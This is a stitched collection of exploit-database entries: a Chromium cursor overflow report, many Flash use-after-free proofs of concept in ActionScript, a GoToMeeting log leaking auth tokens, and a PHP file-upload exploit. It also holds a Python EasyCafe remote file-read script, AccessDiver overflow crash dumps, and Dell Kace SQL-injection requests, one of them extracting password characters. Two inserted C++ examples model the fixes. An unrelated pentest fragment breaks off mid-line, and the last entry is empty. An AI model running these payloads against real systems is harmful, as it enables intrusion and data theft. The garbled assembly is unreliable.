
Source: https://code.google.com/p/google-security-research/issues/detail?id=664

There is an overflow in the ui::PlatformCursor WebCursor::GetPlatformCursor method. In src/content/common/cursors/webcursor_aurax11.cc, there is the following code:

bitmap.allocN32Pixels(custom_size_.width(), custom_size_.height());
memcpy(bitmap.getAddr32(0, 0), custom_data_.data(), custom_data_.size());

The bitmap buffer is allocated based on the width and height of the custom_size_, but the memcpy is performed using the size of the custom_data_.

These values are set during WebCursor deserialization in src/content/common/cursors/webcursor.cc in WebCursor::Deserialize.

custom_size_ is set from two integers that are deserialized from a message and can be between 0 and 1024. custom_data_ is set from a vector that is deserialized, and can be any size, unrelated to the width and height. The custom_data_ is verified not to be smaller than the expected pixel buffer based on the width and height, but can be longer.

GetPlatformCursor is called indirectly by RenderWidgetHostImpl::OnSetCursor, which is called in response to a  ViewHostMsg_SetCursor message from the renderer.

The issue above is in the x11 implementation, but it appears to also affect the other platform-specific implementations, except the Windows one, which instead reads out of bounds.

I recommend this issue be fixed by changing the check in WebCursor::Deserialize:

if (size_x * size_y * 4 > data_len)
    return false;

to

if (size_x * size_y * 4 != data_len)
    return false;

to prevent the issue in all platform-specific implementations.
 
To reproduce the issue replace WebCursor::Serialize with:

bool WebCursor::Serialize(base::Pickle* pickle) const {

  if(type_ == WebCursorInfo::TypeCustom){
  LOG(WARNING) << "IN SERIALIZE\n";
  if (!pickle->WriteInt(type_) ||
      !pickle->WriteInt(hotspot_.x()) ||
      !pickle->WriteInt(hotspot_.y()) ||
      !pickle->WriteInt(2) ||
      !pickle->WriteInt(1) ||
      !pickle->WriteFloat(custom_scale_))
     return false;
   }else{

     if (!pickle->WriteInt(type_) ||
      !pickle->WriteInt(hotspot_.x()) ||
      !pickle->WriteInt(hotspot_.y()) ||
      !pickle->WriteInt(custom_size_.width()) ||
      !pickle->WriteInt(custom_size_.height()) ||
      !pickle->WriteFloat(custom_scale_))
    return false;

  }
  const char* data = NULL;
  if (!custom_data_.empty())
    data = &custom_data_[0];
  if (!pickle->WriteData(data, custom_data_.size()))
    return false;

  return SerializePlatformData(pickle);
}

and visit the attached html page, with the attached image in the same directory.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39039.zip
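
The length check recommended in the WebCursor report above, shown side by side with the original one. This is an added example, not Chromium code: CursorMessage, AcceptLoose, AcceptStrict, OverrunBytes and CopyToBitmap are hypothetical names, and the sample message (a 2x1 cursor carrying 4096 bytes) is constructed.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <iostream>
#include <vector>

// Hypothetical stand-in for the fields WebCursor::Deserialize reads.
struct CursorMessage {
  int size_x;
  int size_y;
  std::vector<char> data;  // plays the role of custom_data_
};

// The report states that each dimension can be between 0 and 1024.
constexpr int kMaxCursorDimension = 1024;

// Bytes an N32 (4 bytes per pixel) bitmap of this size holds,
// or -1 when a dimension is out of range. 64-bit math cannot wrap here.
int64_t ExpectedPixelBytes(int size_x, int size_y) {
  if (size_x < 0 || size_y < 0 || size_x > kMaxCursorDimension ||
      size_y > kMaxCursorDimension)
    return -1;
  return static_cast<int64_t>(size_x) * size_y * 4;
}

// Original check: only rejects data that is too short.
bool AcceptLoose(const CursorMessage& m) {
  const int64_t expected = ExpectedPixelBytes(m.size_x, m.size_y);
  if (expected < 0) return false;
  return expected <= static_cast<int64_t>(m.data.size());
}

// Recommended check: the data must be exactly width * height * 4 bytes.
bool AcceptStrict(const CursorMessage& m) {
  const int64_t expected = ExpectedPixelBytes(m.size_x, m.size_y);
  if (expected < 0) return false;
  return expected == static_cast<int64_t>(m.data.size());
}

// Bytes that memcpy(dst, data, data.size()) would write past a bitmap
// allocated from size_x and size_y. Computed only, never performed.
int64_t OverrunBytes(const CursorMessage& m) {
  const int64_t expected = ExpectedPixelBytes(m.size_x, m.size_y);
  const int64_t len = static_cast<int64_t>(m.data.size());
  return (expected >= 0 && len > expected) ? len - expected : 0;
}

// Defence in depth at the copy site: size the copy by the destination,
// so a message that slipped past validation still cannot overrun it.
bool CopyToBitmap(const CursorMessage& m, std::vector<uint32_t>* bitmap) {
  const int64_t expected = ExpectedPixelBytes(m.size_x, m.size_y);
  if (expected < 0 || static_cast<int64_t>(m.data.size()) < expected)
    return false;
  bitmap->assign(static_cast<size_t>(expected / 4), 0);
  if (expected > 0)
    std::memcpy(bitmap->data(), m.data.data(), static_cast<size_t>(expected));
  return true;
}

int main() {
  // Constructed sample: declares 2x1 pixels (8 bytes) but carries 4096 bytes.
  const CursorMessage oversized{2, 1, std::vector<char>(4096, 'A')};
  std::cout << "loose check accepts:  " << AcceptLoose(oversized) << "\n"
            << "strict check accepts: " << AcceptStrict(oversized) << "\n"
            << "bytes past bitmap:    " << OverrunBytes(oversized) << "\n";
  return 0;
}
```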
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=593

There is a use-after-free in MovieClip.attachBitmap. If the depth parameter is an object with valueOf defined, this method can free the MovieClip, which is then used.

A minimal PoC follows:

this.createEmptyMovieClip("mc", 1);
var b = new flash.display.BitmapData(100, 100, true, 0x77777777);
mc.attachBitmap( b, {valueOf : func });

function func(){
	
	mc.removeMovieClip();
	
        // Fix heap here

        return 5;
	
	}
	


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39040.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=591

There is a use-after-free in MovieClip.duplicateMovieClip. If the depth or movie name parameter provided is an object with toString or valueOf defined, this method can free the MovieClip, which is then used. 

A minimal PoC follows:


this.createEmptyMovieClip("mc", 1);

mc.duplicateMovieClip( "mc",{valueOf : func});


function func(){
	
	trace("in func");
	mc.removeMovieClip();

        // Fix heap here

	return 5;
	
	}
	
	
A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39042.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=590

There is a use-after-free in Selection.SetSelection. If it is called with a number parameter, which is an object with valueOf defined, and this function frees the parent of the TextField parameter, the object is used after it is freed. A minimal PoC follows:

var mc = this.createEmptyMovieClip("mc", 301);
var myText_txt = mc.createTextField("myText_txt", 302, 1, 1, 100, 100);
myText_txt.text = "this is my text";
Selection.setFocus("myText_txt");
var n = {valueOf : func};
Selection.setSelection(n, 3);

function func(){

  mc.removeMovieClip();
  // Fix heap here
  return 0;

}

A sample swf and fla are attached. Note that this PoC only works on 64-bit platforms.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39043.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=586

The TextField setFormat method contains a use-after-free. If an integer parameter has valueOf defined, or the object parameter overrides a constructor, this method can free the TextField parent, which is subsequently used.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
var f = new TextFormat();
tf.setFormat( {valueOf : func}, 2, f);

function func(){

        if(times == 0){
             times++;
             return 0;

         }

	mc.removeMovieClip();

        // Fix heap here

	return 0;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39046.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=588

There is a use-after-free in the TextField sharpness setter. If the sharpness parameter is an object with valueOf set to a function which frees the TextField parent, it is used after it is freed.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.sharpness = {valueOf : func};

function func(){
   
        if(times == 0){
          times++;
          return 0;
        }

	mc.removeMovieClip();

        // Fix heap here

	return 0;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39044.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=587

There is a use-after-free in the TextField thickness setter. If the thickness parameter is an object with valueOf set to a function which frees the TextField parent, it is used after it is freed.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.thickness = {valueOf : func};

function func(){
   
        if(times == 0){
          times++;
          return 0;
        }

	mc.removeMovieClip();

        // Fix heap here

	return 0;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39045.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=585

There is a use-after-free in TextField.replaceSel. If the string parameter of the method is set to an object with toString defined, this method can delete the TextField's parent, leading to a use-after-free.

A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.replaceSel({valueOf : func});

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "text";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39047.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=584

There is a use-after-free in the TextField.replaceText function. If the function is called with a string parameter with toString defined, or an integer parameter with valueOf defined, the parent object of the TextField can be used after it is freed. Please note that all three parameters of this function are susceptible to this issue.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.replaceText( 1, 2, {valueOf : func});

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "text";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39048.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=579

There is a use-after-free in the TextField.variable setter. If the variable name that is added is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.variable = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "myvar";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39050.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=583

If a TextField variable is set to a value with toString defined, and the TextField is updated, a use-after-free can occur if the toString method frees the TextField's parent. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 301);
var my_txt = mc.createTextField("my_txt", 302, 0, 0, 100, 100); 
trace(my_txt);
my_txt.variable = "today_date"; 
mc.today_date = "blah"; 
var times = 0;
 
var date_interval:Number = setInterval(updateDate, 500);
 
function updateDate() { 
    mc.today_date = {toString : func}; 
}

function func(){
	if(times == 0){
		times++;
		mc.removeMovieClip();
	}

	return "test";
	
	}

A sample fla and swf are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39049.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=578

There is a use-after-free in the TextField.htmlText setter. If the htmlText the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.htmlText = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "<b>hello</b>";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39051.zip
            

0x01 Introduction

I found the interface of a porn app.

I looked through its features and found a registration page, but registering actually required an invitation code!

0x02 Penetration process

So I put the app in a virtual machine and captured packets to get the real domain name.

Next, I used the BP crawler to crawl the API endpoints.

The response said a parameter was missing, so I fuzzed a round of parameters.

http://www。

Source: https://code.google.com/p/google-security-research/issues/detail?id=577

There is a use-after-free in the TextField.type setter. If the type the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.type = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "input";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39052.zip
            
Source:  https://code.google.com/p/google-security-research/issues/detail?id=576

There is a use-after-free in the TextField.text setter. If the text the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.text = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "natalie";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39053.zip
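
The Flash reports above (attachBitmap, duplicateMovieClip, setSelection, and the TextField methods and setters) share one shape: a native method resolves its target object, then coerces an argument through a script-defined valueOf or toString that can free that target. The following added example models that ordering and a hardened one in a toy runtime; it is not Adobe's code or fix, and Stage, MovieClip, ScriptNumber and both AttachBitmap functions are hypothetical names.

```cpp
#include <functional>
#include <iostream>
#include <map>
#include <memory>
#include <string>

// Toy display object; stands in for the MovieClip / TextField parent.
struct MovieClip {
  int bitmap_depth = -1;
};

// Owns every clip. Remove() models removeMovieClip(): it drops the only
// strong reference, so the object is destroyed immediately.
class Stage {
 public:
  std::weak_ptr<MovieClip> Create(const std::string& name) {
    auto clip = std::make_shared<MovieClip>();
    clips_[name] = clip;
    return clip;
  }
  void Remove(const std::string& name) { clips_.erase(name); }

 private:
  std::map<std::string, std::shared_ptr<MovieClip>> clips_;
};

// A script argument whose conversion to a number runs script code (valueOf).
using ScriptNumber = std::function<int()>;

enum class Outcome { kApplied, kRejectedTargetGone, kWouldUseFreedObject };

// Ordering described in the reports: resolve the target, then coerce.
// The model reports the dangling pointer instead of dereferencing it.
Outcome AttachBitmapUnsafeOrder(const std::weak_ptr<MovieClip>& handle,
                                const ScriptNumber& depth) {
  MovieClip* raw = handle.lock().get();  // no strong reference is kept
  if (!raw) return Outcome::kRejectedTargetGone;
  const int d = depth();  // script runs here and may remove the clip
  if (handle.expired())   // raw now dangles; native code would go on to use it
    return Outcome::kWouldUseFreedObject;
  raw->bitmap_depth = d;
  return Outcome::kApplied;
}

// Hardened ordering: coerce every argument exactly once, first; then take
// a strong reference and re-validate the target before touching it.
Outcome AttachBitmapHardened(const std::weak_ptr<MovieClip>& handle,
                             const ScriptNumber& depth) {
  const int d = depth();
  std::shared_ptr<MovieClip> self = handle.lock();
  if (!self) return Outcome::kRejectedTargetGone;
  self->bitmap_depth = d;
  return Outcome::kApplied;
}

// Runs the pattern from the PoCs: valueOf removes the clip and returns 5.
Outcome RunFreeingScenario(bool hardened) {
  Stage stage;
  std::weak_ptr<MovieClip> mc = stage.Create("mc");
  ScriptNumber freeing = [&stage] {
    stage.Remove("mc");
    return 5;
  };
  return hardened ? AttachBitmapHardened(mc, freeing)
                  : AttachBitmapUnsafeOrder(mc, freeing);
}

int main() {
  std::cout << "unsafe order flags freed target: "
            << (RunFreeingScenario(false) == Outcome::kWouldUseFreedObject)
            << "\nhardened order rejects call:     "
            << (RunFreeingScenario(true) == Outcome::kRejectedTargetGone)
            << "\n";
  return 0;
}
```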
            
source: https://www.securityfocus.com/bid/65123/info

GoToMeeting for Android is prone to multiple local information-disclosure vulnerabilities.

Local attackers can exploit these issues to obtain sensitive information, which may aid in further attacks.

GoToMeeting 5.0.799.1238 is vulnerable; other versions may also be affected. 

<! ----- SNIPPET ------- !>

D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
E/qcom_sensors_hal(  787): hal_process_report_ind: Bad item quality: 11 
D/dalvikvm(32190): GC_CONCURRENT freed 1322K, 43% free 20491K/35456K, paused 6ms+1ms, total 33ms
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
 -> 200
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
 -> {"Status":"Redirect","RedirectHost":"www1.gotomeeting.com","MeetingId":"[MEETING_ID_REDACTED]"}
D/G2M     (32190): Got 302 from legacy JSON API: www1.gotomeeting.com
D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> 200
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> 
{"Status":"MeetingNotStarted","MeetingId":"[MEETING_ID_REDACTED]","IsRecurring":false,"Endpoints":["Native"],"OrganizerName":"[REDACTED]","Subject":"[REDACTED]","MaxAttendees":100,"IsWebinar":false,"AudioParameters":{"CommParams":{"disableUdp":false},"ConferenceParams":{"supportedModes":"VoIP,PSTN,Private","initialMode":"Hybrid","SpeakerInfo":{"PhoneInfo":[{"description":"Default","number":"[REDACTED],"authToken":"AAFe4rYexu4Dm7qrL45/Egx+AAAAAFLdeSkAAAAAUt7KqUbWYmXH3OcczkhGaWRf0wM2OKWa","accessCode":"REDACTED"},"userId":"userId","authToken":"EAEBAQEBAQEBAQEBAQEBAQE=","privateMessage":"","audioKey":-1,"BridgeMutingControl":true,"VCBParams":{"Codec":[{"payloadType":103,"frameLength":30,"name":"ISAC","bitrate":32000,"channels":1,"samplingRate":16000},{"payloadType":0,"frameLength":20,"name":"PCMU","bitrate":64000,"ch
 
annels":1,"samplingRate":8000}],"VCB":{"port":5060,"ipAddr":"10.23.70.151"},"Options":{"asUpdates":true,"rtUpdates":true,"dtx":false}}}},"EndTime":1390239900000,"StartTime":1390237200000,"IsImpromptu":false}
D/G2M     (32190): Got response from legacy JSON API: 200
D/G2M     (32190): JoinService: Attempting to join Meeting
D/G2M     (32190): MeetingService: Starting Meeting join on legacy...
D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
D/G2M     (32190): ServiceResolver: COLService: BaseURL [https://www.example.com], isLegacy [true}, isWebinar 
[false]
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
 -> 302
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
 -> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<! ----- SNIPPET ------- !>
            
source: https://www.securityfocus.com/bid/65646/info

MODx Evogallery module is prone to an arbitrary file upload vulnerability.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
$uploadfile="file.php"; 
$ch = curl_init("demo.ltd/assets/modules/evogallery/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,       
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
            
#!/usr/bin/python -w
# Title : EasyCafe Server <= 2.2.14 Remote File Read
# Date : 25/12/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Software Link : http://www.tinasoft.com/easycafe/
# Download Link: http://www.tinasoft.com/Download/easysetup.exe
# Vulnerable Versions : EasyCafe Server <= 2.2.14
# EasyCafe Server has a feature to upload a file from the server to a client.
# The request works as follows. EasyCafe Server sends a UDP request to the client with the file that it wants to upload,
# then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.
# The problem is that a remote attacker can connect to port 831 and can retrieve a file because the server doesn't validate the request,
# and does not check if it has sent the UDP request, which gives us full Read access to the system.
#
#EDB Note: Code may need some adjusting

import socket
#Banner
banner = ""
banner += "  ___        __        ____                 _    _  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner



IP = "192.168.43.36" # Target IP
PORT = 831
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
file_to_read = "\x43" + file_to_read
hex_value = ''.join(x.encode('hex') for x in file_to_read)
fill = "\x00"
end = "\x01\x00\x00\x00\x01"
payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end
s.send(payload)
s.settimeout(0)
print "[+] Request Send Waiting for Response . . . [+]"

try:
	data = s.recv(261) # Get header
	while data:
		data = s.recv(2048)
		print data
		
except Exception:
	print "[+] https://www.infogen.al/ [+]"
finally:			
	s.close()
            
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt



Vendor:
==============
M. Jean Fages
www.accessdiver.com
circa 1998-2006


Product:
=============================
AccessDiver V4.301 build 5888


AccessDiver is a security tester for Web pages. It has got a set of tools
which will verify the robustness of your accounts and directories. You will
know if your customers, your users and you can use safely your web site.


Vulnerability Type:
===================
Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

AccessDiver is vulnerable to multiple buffer overflows; two vectors are
described below.

1) Buffer overflow @ 2073 bytes in URL field for Server / IP address, which
will overwrite the NSEH and SEH exception handlers.

EAX 00000000
ECX 52525252
EDX 7C9037D8 ntdll.7C9037D8
EBX 00000000
ESP 0012EA08
EBP 0012EA28
ESI 00000000
EDI 00000000
EIP 52525252                 <----------------- BOOM
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 1272  Prec NEAR,53  Mask    1 1 0 0 1 0



2) Buffer overflow when loading a malicious "Exploit zone file" text file
containing 2080 bytes: load the text file from the "Weak History" menu,
choose Import "from File", choose the exploit text file and BOOM!


EAX 00000000
ECX 52525242
EDX 7702B4AD ntdll.7702B4AD
EBX 00000000
ESP 0018E940
EBP 0018E960
ESI 00000000
EDI 00000000
EIP 52525242                      <----------------- KABOOM
C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 1  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0


Windbg dump...

(2abc.2330): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=52525252 edx=7702b4ad esi=00000000 edi=00000000
eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
52525252 ??              ???



Disclosure Timeline:
=====================================
Vendor Notification:  NA
December 26, 2015 : Public Disclosure




Exploitation Technique:
=======================
Local



Severity Level:
================
Med



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
            
source: https://www.securityfocus.com/bid/65029/info

Dell Kace 1000 Systems Management Appliance is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Dell Kace 1000 Systems Management Appliance 5.4.76847 is vulnerable; other versions may also be affected. 

Proof of Concept
Page: /service/kbot_service.php
Web method: getUploadPath
Parameter: macAddress
PoC: Variations of the statement within the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: www.example.com
SOAPAction: "urn:#getUploadPath"
Content-Length: 543

<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:getUploadPath soapenv:encodingStyle= "http://example.xmlsoap.org/soap/encoding/">
         <macAddress xsi:type="xsd:string">' or '1'='1</macAddress>
         <filename xsi:type="xsd:string">test</filename>
      </urn:getUploadPath>
   </soapenv:Body>
</soapenv:Envelope>
Page: /service/kbot_service.php
Web method: getKBot
Parameter: macAddress
PoC: Variations of the statement within the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: www.example.com
Content-Type: text/xml;charset=UTF-8
SOAPAction: "urn:#getKBot"
Content-Length: 553

<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:getKBotConfig soapenv:encodingStyle="http://example.xmlsoap.org/soap/encoding/">
         <macAddress xsi:type="xsd:string">' or (select ascii(substring(PASSWORD,1,1)) from USER limit 2,1) = 101 and ''='</macAddress>
      </urn:getKBotConfig>
   </soapenv:Body>
</soapenv:Envelope>
The following pages also appear to be affected by similar SQL injection weaknesses, but require authentication:
Page: /userui/advisory_detail.php
PoC: http://www.example.com/userui/advisory_detail.php?ID=9-2
Notes: Requires Authentication
Page: /userui/ticket_list.php?SEARCH_SELECTION=any&ORDER[]=ID
Parameter: ORDER[]
Notes: Requires Authentication
Page: /userui/ticket.php?ID=86
Parameter: ID
Notes: Requires Authentication
            
source: https://www.securityfocus.com/bid/65059/info

Imageview is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Imageview 6.x is vulnerable; other versions may also be affected. 

http://www.example.com/photos/upload.php
http://www.example.com/Galerie/upload.php 
            
source: https://www.securityfocus.com/bid/65121/info

XOS Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

XOS Shop 1.0 rc7o is vulnerable; other versions may also be affected. 

http://www.example.com/Xoshop/shop/redirect.php?action=url&goto=[SQLI] 
            
source: https://www.securityfocus.com/bid/65060/info

